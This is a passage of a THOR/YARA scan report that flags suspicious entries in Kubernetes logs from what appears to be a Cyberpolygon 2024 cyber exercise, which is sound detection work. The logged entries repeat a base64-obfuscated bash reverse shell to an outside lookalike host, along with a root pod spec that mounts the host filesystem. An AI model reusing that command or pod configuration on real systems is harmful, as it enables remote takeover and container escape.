SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 10
|
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"moI_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw\", \"pid\":164780, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403096678Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164780}, \"parent\":{\"exec_[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bdd9d6db3cc4128c22036953fd9609d43620c277b","name":"mlops-metrics","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 11
|
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"bII_uJEBNKI3r7qcaSsv","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx\", \"pid\":164781, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403116085Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164781}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4N[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]rics","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 12
|
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"rYI-uJEBNKI3r7qc8xbx","_score":1,"_source":{"@timestamp":"2024-09-03T14:16:49.946Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"9d73066b-0f58-4778-8e79-7f199f2e21e2\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods?fieldManager=kubectl-client-side-apply\\u0026fieldValidation=Strict\",\"verb\":\"create\",\"user\":{\"username\":\"system:serviceaccount:prod:prod-pod-creator\",\"uid\":\"09efc0da-119d-4977-bfa3-a2036547d714\",\"groups\":[\"system:serviceaccounts\",\"system:serviceaccounts:prod\",\"system:authenticated\"],\"extra\":{\"authentication.kubernetes.io/pod-name\":[\"mercury-mlflow-6f9d898884-ddtt9\"],\"authentication.kubernetes.io/pod-uid\":[\"dbd80eda-95e5-4b05-86e0-b649bf8733ba\"]}},\"sourceIPs\":[\"10.244.85.228\"],\"userAgent\":\"kubec[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]am/utils\",\"args\":[\"sh\",\"-c\",\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"],\"resources\":{},\"volumeMounts\":[{\"name\":\[...]bels\\\":{\\\"app\\\":\\\"mlops-metrics\\\"},\\\"name\\\":\\\"mlops-metrics\\\",\\\"namespace\\\":\\\"prod\\\"},\\\"spec\\\":{\\\"containers\\\":[{\\\"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\\"name\\\":\\\"mlops-metrics\\\",\\\"securityContext\\\":{\\\"runAsUser\\\":0},\\\"volumeMounts\\\":[{\\\"mountPath\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersio
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Notices | |
---|---|
Notice 1
|
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
|
Notice 2
|
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
|
Notice 3
|
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
|
Notice 4
|
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
|
Notice 5
|
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
|
Notice 6
|
Sep 10 18:47:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 18:47:10 2024
ALERTS:
0
WARNINGS:
12
NOTICES:
5
ERRORS:
0
|